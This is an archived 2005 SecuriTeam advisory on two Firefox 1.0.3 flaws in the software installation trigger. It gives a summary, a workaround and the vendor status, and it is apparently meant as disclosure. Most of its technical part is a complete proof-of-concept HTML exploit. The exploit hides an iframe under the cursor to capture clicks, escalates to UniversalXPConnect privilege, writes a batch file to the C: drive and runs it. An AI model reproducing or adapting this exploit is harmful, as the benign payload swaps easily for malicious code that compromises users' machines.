[EXPL] Mozilla Firefox Arbitrary Code Execution (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/10/05
- Previous message: SecuriTeam: "[NT] Adobe SVG Viewer Local File Detection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 10 May 2005 13:15:28 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mozilla Firefox Arbitrary Code Execution (Exploit)
------------------------------------------------------------------------
SUMMARY
Mozilla Firefox (originally known as Phoenix and briefly as Mozilla
Firebird) is "a free, cross-platform, graphical web browser developed by
the Mozilla Foundation and hundreds of volunteers".
Two vulnerabilities have been discovered in Firefox, which can be
exploited by malicious people to run malicious code on vulnerable systems
and compromise its integrity.
DETAILS
Vulnerable Systems:
* Mozilla Firefox version 1.0.3
This proof of concept involve exploiting two flaws:
1) Tricking Firefox into thinking a software installation is being
triggered by a whitelisted site, using history stored trusted URL.
2) Software installation trigger not sufficiently checking image URLs
containing JavaScript code.
Workaround:
Disable software installation (Web Features panel of the
Options/Preferences window in Firefox 1.0.3 or the Content panel in the
latest trunk builds).
Vendor Status:
The Mozilla Foundation patched (partially) this issue on the server side
by adding random letters and numbers to the install function, which will
prevent this exploit from working. We anticipate that the Mozilla
Foundation will release a Firefox 1.0.4 update shortly.
Exploit:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
< html>
< head>
< title>Firefox Full Remote Compromise</title>
</head>
< body>
Click anywhere inside this page to compromise your system!<br>
Don't worry. Only a harmless batch file will be run. View the source if
you dont believe me ;)<br>
Like I said in my Internet Explorer Auto-SP2 RC analysis, nothing is
perfect. Breaking something, or if you're the hacker, building something,
only requires patience and a little bit of spare time.<br> <br>
Greetz to Mikx, Michael Evanchik, and the entire Mozilla team. This is a
very nice browser you guys have put together!
< iframe onload="loader()" src="javascript:'< noscript>'+eval('if
(window.name!=\'stealcookies\')
{ window.name=\'stealcookies\'; } else { event=
{ target:{ href:
\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'} };
install(event, \'You are
vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.
enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\'); file =
Components.classes
[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');
file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream =
Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].
createInstance( Components.interfaces.nsIFileOutputStream );
outputStream.init(file,0x04|0x08|0x20,420,0); output=\\\\\\\'@ECHO
off\\\\\\\\ncls\\\\\\\\n
ECHO If I wasnt so nice, this could have been a virus...
\\\\\\\\nPAUSE\\\\\\\';
outputStream.write(output,output.length); outputStream.close();
file.launch();\\\')\'); }') + '</noscript>< a
href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&
application=firefox\' style=\'cursor:default;\'> </'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0"
marginheight=0"
style="position:absolute; left:0px; width:0px;height:6px; width:6px;
margin:0px;
padding:0px; -moz-opacity:0"></iframe>
< script language="JavaScript" type="text/javascript">
document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>
Bugzilla:
<https://bugzilla.mozilla.org/show_bug.cgi?id=292691>
https://bugzilla.mozilla.org/show_bug.cgi?id=292691 (limited access)
ADDITIONAL INFORMATION
The information has been provided by <mailto:tuytumadre@att.net>
tuytumadre@att.net.
The original article can be found at:
<http://greyhatsecurity.org/vulntests/ffrc.htm>
http://greyhatsecurity.org/vulntests/ffrc.htm
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Adobe SVG Viewer Local File Detection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
